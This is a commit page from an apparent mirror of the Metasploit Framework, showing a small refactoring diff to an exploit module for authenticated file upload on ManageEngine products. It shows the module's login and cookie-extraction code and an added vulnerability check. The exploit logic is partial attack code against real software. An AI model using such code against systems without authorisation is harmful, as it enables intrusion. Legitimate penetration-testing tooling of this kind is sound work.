infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Avoid modify datastore options

bug/bundler_fix
jvazquez-r7 2015-01-19 17:11:31 -06:00
parent 3c0efe4a7e
commit ed26a2fd77
1 changed files with 16 additions and 13 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
modules/exploits/multi/http/manageengine_auth_upload.rb
View File

@ -163,29 +163,25 @@ class Metasploit3 < Msf::Exploit::Remote
} }
else else
vars_post = { vars_post = {
'LOGIN_ID' => username, 'LOGIN_ID' => username,
'PASSWORD' => password, 'PASSWORD' => password,
'isADEnabled' => 'true', 'isADEnabled' => 'true',
'domainName' => datastore['DOMAIN_NAME'] 'domainName' => datastore['DOMAIN_NAME']
} }
end end
sd_port = datastore['RPORT']
datastore['RPORT'] = port
res = send_request_cgi({ res = send_request_cgi({
'rport' => port,
'method' => 'POST', 'method' => 'POST',
'uri' => normalize_uri(path), 'uri' => normalize_uri(path),
'vars_get' => { 'vars_get' => {
'service' => 'ServiceDesk', 'service' => 'ServiceDesk',
'furl' => '/', 'furl' => '/',
'timestamp' => Time.now.to_i 'timestamp' => Time.now.to_i
}, },
'vars_post' => vars_post 'vars_post' => vars_post
}) })
datastore['RPORT'] = sd_port
if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/
# /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ -> this pattern is to avoid matching "removed" # /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ -> this pattern is to avoid matching "removed"
return res.get_cookies return res.get_cookies
@ -211,7 +207,7 @@ class Metasploit3 < Msf::Exploit::Remote
def login_it360 def login_it360
# Do we already have a valid cookie? If yes, just return that. # Do we already have a valid cookie? If yes, just return that.
if datastore['IAMAGENTTICKET'] != nil if datastore['IAMAGENTTICKET']
cookie_name = get_it360_cookie_name cookie_name = get_it360_cookie_name
cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';' cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'
return cookie return cookie
@ -230,6 +226,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD']) cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD'])
if cookie != nil if cookie != nil
return cookie return cookie
elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
@ -371,6 +368,11 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
if check == Exploit::CheckCode::Safe
fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable")
end
print_status("#{peer} - Selecting target...")
@my_target = pick_target @my_target = pick_target
print_status("#{peer} - Selected target #{@my_target.name}") print_status("#{peer} - Selected target #{@my_target.name}")
@ -379,6 +381,7 @@ class Metasploit3 < Msf::Exploit::Remote
else else
cookie = login cookie = login
end end
if cookie == nil if cookie == nil
fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to authenticate") fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to authenticate")
end end